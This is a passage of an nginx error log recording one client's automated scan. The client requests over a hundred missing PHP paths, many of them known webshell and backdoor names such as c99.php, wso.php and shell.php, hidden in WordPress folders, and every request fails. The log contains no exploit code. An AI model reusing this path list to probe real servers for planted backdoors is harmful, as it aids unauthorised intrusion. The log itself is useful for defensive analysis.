4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/assets/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:01 [error] 230#230: *5254 open() "/var/www/html/luxe.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /luxe.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:02 [error] 230#230: *5254 "/var/www/html/update/wpupex.php/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /update/wpupex.php/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:02 [error] 230#230: *5254 open() "/var/www/html/rezor.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /rezor.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:02 [error] 230#230: *5254 open() "/var/www/html/doc.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //doc.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:02 [error] 230#230: *5254 open() "/var/www/html/wp-admin/user/index.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/user/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:02 [error] 230#230: *5254 open() "/var/www/html/wp-includes/css/about.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/css/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:02 [error] 230#230: *5254 open() "/var/www/html/install.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //install.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:03 [error] 230#230: *5254 open() "/var/www/html/~norapump/hah.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /~norapump/hah.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:03 [error] 230#230: *5254 open() "/var/www/html/sto.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /sto.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:03 [error] 230#230: *5254 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //x.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:03 [error] 230#230: *5254 open() "/var/www/html/test.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //test.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:03 [error] 230#230: *5254 "/var/www/html/wp-includes/blocks/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/blocks/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:03 [error] 230#230: *5254 open() "/var/www/html/n3.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /n3.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:04 [error] 230#230: *5254 open() "/var/www/html/wp-admin/install.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/install.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:04 [error] 230#230: *5254 open() "/var/www/html/o.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /o.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:04 [error] 230#230: *5254 open() "/var/www/html/wp-includes/ID3/index.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/ID3/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:04 [error] 230#230: *5254 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:04 [error] 230#230: *5254 "/var/www/html/.trash7309/f/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /.trash7309/f/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:04 [error] 230#230: *5254 open() "/var/www/html/wp.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:05 [error] 230#230: *5254 open() "/var/www/html/wp-includes/customize/index.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/customize/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:05 [error] 230#230: *5254 open() "/var/www/html/wp-content/themes/seotheme/mar.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/seotheme/mar.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:05 [error] 230#230: *5254 open() "/var/www/html/h.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //h.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:05 [error] 230#230: *5254 open() "/var/www/html/skin/install/default/security.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //skin/install/default/security.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:05 [error] 230#230: *5254 open() "/var/www/html/wrt.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wrt.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:05 [error] 230#230: *5254 open() "/var/www/html/wp-content/plugins/Core-EconX/up.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/plugins/Core-EconX/up.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:06 [error] 230#230: *5254 "/var/www/html/wp-includes/css/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/css/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:06 [error] 230#230: *5254 open() "/var/www/html/images/c99.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /images/c99.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:06 [error] 230#230: *5254 open() "/var/www/html/png.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /png.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:06 [error] 230#230: *5254 open() "/var/www/html/wp-includes/ID3/index.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/ID3/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:06 [error] 230#230: *5254 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //zwso.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:06 [error] 230#230: *5254 open() "/var/www/html/wp-content/languages/index.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/languages/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:07 [error] 230#230: *5254 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:07 [error] 230#230: *5254 open() "/var/www/html/wp/wp-includes/index.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp/wp-includes//index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:07 [error] 230#230: *5254 open() "/var/www/html/ton.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /ton.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:07 [error] 230#230: *5254 open() "/var/www/html/wso.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wso.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:07 [error] 230#230: *5254 "/var/www/html/images/fk2e3/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /images/fk2e3/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:07 [error] 230#230: *5254 open() "/var/www/html/a2.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /a2.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:08 [error] 230#230: *5254 open() "/var/www/html/shell.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /shell.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:08 [error] 230#230: *5254 open() "/var/www/html/wp-includes/IXR/moon.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/IXR/moon.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:08 [error] 230#230: *5254 open() "/var/www/html/sxo.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /sxo.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:08 [error] 230#230: *5254 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //admin.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:08 [error] 230#230: *5254 "/var/www/html/wp-admin/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:09 [error] 230#230: *5254 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:09 [error] 230#230: *5254 open() "/var/www/html/mans.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /mans.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:09 [error] 230#230: *5254 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //dropdown.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:09 [error] 230#230: *5254 "/var/www/html/WordPress/x/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /WordPress/x/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:09 [error] 230#230: *5254 open() "/var/www/html/ze.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /ze.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:09 [error] 230#230: *5254 open() "/var/www/html/geck.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //geck.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:10 [error] 230#230: *5254 open() "/var/www/html/menu.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /menu.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:10 [error] 230#230: *5254 open() "/var/www/html/admin/function.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //admin/function.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:10 [error] 230#230: *5254 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //index/function.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:10 [error] 230#230: *5254 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:10 [error] 230#230: *5254 open() "/var/www/html/ftp.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /ftp.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:10 [error] 230#230: *5254 open() "/var/www/html/mds.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /mds.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:11 [error] 230#230: *5254 open() "/var/www/html/ahax.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /ahax.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:11 [error] 230#230: *5254 open() "/var/www/html/wp-admin/class-db.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/class-db.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:11 [error] 230#230: *5254 open() "/var/www/html/cool.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /cool.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:11 [error] 230#230: *5254 open() "/var/www/html/gm.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /gm.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:11 [error] 230#230: *5254 open() "/var/www/html/simple.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //simple.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:11 [error] 230#230: *5254 open() "/var/www/html/elp.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //elp.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:12 [error] 230#230: *5254 open() "/var/www/html/bolt.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /bolt.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:12 [error] 230#230: *5254 open() "/var/www/html/wp-content/uploads/index.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/uploads/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:12 [error] 230#230: *5254 open() "/var/www/html/inputs.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //inputs.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:12 [error] 230#230: *5254 "/var/www/html/.trash7309/fafa/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /.trash7309/fafa/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:12 [error] 230#230: *5254 open() "/var/www/html/system.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /system.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:12 [error] 230#230: *5254 "/var/www/html/wp-admin/maint/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:13 [error] 230#230: *5254 "/var/www/html/wp-admin/network/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/network/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:13 [error] 230#230: *5254 open() "/var/www/html/museu/yhweq.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /museu/yhweq.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:13 [error] 230#230: *5254 open() "/var/www/html/an.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /an.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:13 [error] 230#230: *5254 open() "/var/www/html/w.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //w.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:13 [error] 230#230: *5254 open() "/var/www/html/gmo.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /gmo.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:13 [error] 230#230: *5254 open() "/var/www/html/gib.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /gib.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:14 [error] 230#230: *5254 open() "/var/www/html/wp-miiss.php.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp-miiss.php.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:14 [error] 230#230: *5254 open() "/var/www/html/ho/wpup.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /ho/wpup.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:14 [error] 230#230: *5254 open() "/var/www/html/moon.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //moon.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:14 [error] 230#230: *5254 open() "/var/www/html/filesss.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /filesss.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:14 [error] 230#230: *5254 open() "/var/www/html/hey.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /hey.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:14 [error] 230#230: *5254 open() "/var/www/html/wp-content/themes/seotheme/mar.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/seotheme/mar.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:15 [error] 230#230: *5254 open() "/var/www/html/1337.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //1337.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:15 [error] 230#230: *5254 open() "/var/www/html/buy.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //buy.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:15 [error] 230#230: *5254 open() "/var/www/html/apsarasarts/okk.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /apsarasarts/okk.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:15 [error] 230#230: *5254 open() "/var/www/html/m.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /m.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:15 [error] 230#230: *5254 open() "/var/www/html/wp-is.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp-is.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:15 [error] 230#230: *5254 open() "/var/www/html/jmfi2.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /jmfi2.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:16 [error] 230#230: *5254 open() "/var/www/html/about/function.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //about/function.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:16 [error] 230#230: *5254 open() "/var/www/html/bnn_.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /bnn_.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:16 [error] 230#230: *5254 open() "/var/www/html/wp-content/json.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/json.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:16 [error] 230#230: *5254 open() "/var/www/html/hzz.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /hzz.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:16 [error] 230#230: *5254 open() "/var/www/html/shell20211028.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //shell20211028.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:17 [error] 230#230: *5254 open() "/var/www/html/content.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //content.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:17 [error] 230#230: *5254 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp-content/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:17 [error] 230#230: *5254 open() "/var/www/html/ps.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /ps.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:17 [error] 230#230: *5254 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:17 [error] 230#230: *5254 "/var/www/html/.trash7309/dd/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /.trash7309/dd/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:17 [error] 230#230: *5254 open() "/var/www/html/cache.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /cache.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:18 [error] 230#230: *5254 open() "/var/www/html/ss.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /ss.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:18 [error] 230#230: *5254 open() "/var/www/html/p.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /p.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:18 [error] 230#230: *5254 open() "/var/www/html/wp-content/plugins/achdxhv/languages/admin.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/plugins/achdxhv/languages/admin.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:18 [error] 230#230: *5254 open() "/var/www/html/user.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //user.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:18 [error] 230#230: *5254 "/var/www/html/wp-includes/block-patterns/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/block-patterns/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:18 [error] 230#230: *5254 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //index/function.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:19 [error] 230#230: *5254 open() "/var/www/html/wp.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:19 [error] 230#230: *5254 open() "/var/www/html/rip.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /rip.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:19 [error] 230#230: *5254 open() "/var/www/html/wp4.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp4.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:19 [error] 230#230: *5254 open() "/var/www/html/403.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //403.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:19 [error] 230#230: *5254 open() "/var/www/html/wp-admin/maint/index.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/maint/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:19 [error] 230#230: *5254 open() "/var/www/html/asd67.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /asd67.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:20 [error] 230#230: *5254 open() "/var/www/html/sad/about.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //sad/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:20 [error] 230#230: *5254 open() "/var/www/html/oivcl.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /oivcl.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:20 [error] 230#230: *5254 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:20 [error] 230#230: *5254 open() "/var/www/html/wp-content/themes/deeto/login.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/deeto/login.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:20 [error] 230#230: *5254 open() "/var/www/html/v2.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /v2.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:20 [error] 230#230: *5254 open() "/var/www/html/wp-content/themes/hideo/network.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/hideo/network.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:21 [error] 230#230: *5254 "/var/www/html/x/index.html" is not found (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /x/ HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:21 [error] 230#230: *5254 open() "/var/www/html/.cache/x.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //.cache/x.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:21 [error] 230#230: *5254 open() "/var/www/html/dr.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /dr.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:21 [error] 230#230: *5254 open() "/var/www/html/raw.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /raw.php HTTP/1.1", host: 